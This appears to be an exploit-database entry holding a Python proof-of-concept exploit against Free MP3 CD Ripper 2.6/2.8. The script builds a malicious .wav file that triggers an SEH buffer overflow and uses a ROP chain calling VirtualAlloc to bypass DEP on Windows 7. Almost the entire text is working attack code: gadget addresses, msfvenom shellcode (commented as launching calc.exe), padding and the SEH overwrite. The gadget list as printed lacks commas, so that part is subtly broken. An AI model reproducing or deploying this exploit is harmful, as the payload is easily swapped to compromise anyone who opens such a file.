Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass) Exploit



EKU-ID: 4794 CVE: OSVDB-ID:
Author: naxxo Published: 2015-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
   
# credit to ThreatActor at CoreRed.com
 # Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)
   
   
import struct
   
def create_rop_chain():
   
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x004103fe# POP EAX # RETN [fcrip.exe] 
      0x004e91f4# ptr to &VirtualAlloc() [IAT fcrip.exe]
      0x00418ff8# MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 
      0x00446c97# PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 
      0x41414141# Filler (compensate)
      0x6f4811f8# POP EBP # RETN [vorbisfile.dll] 
      0x1000c5ce# & push esp # ret  [libFLAC.dll]
      0x00415bfb# POP EBX # RETN [fcrip.exe] 
      0x00000001# 0x00000001-> ebx
      0x00415828# POP EDX # RETN [fcrip.exe] 
      0x00001000# 0x00001000-> edx
      0x10005f62# POP ECX # RETN [libFLAC.dll] 
      0x00000040# 0x00000040-> ecx
      0x00409967# POP EDI # RETN [fcrip.exe] 
      0x00412427# RETN (ROP NOP) [fcrip.exe]
      0x00494277# POP EAX # RETN [fcrip.exe] 
      0x90909090# nop
      0x004c8dc0# PUSHAD # RETN [fcrip.exe] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
   
rop_chain = create_rop_chain()
   
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode =  ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"
   
   
   
junk = "A" * 3812
junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode
   
seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}
    
   
buffer = junk + seh + "\x90" * 800
   
   
file = "poc.wav"
f=open(file,"w")
f.write(buffer);
f.close();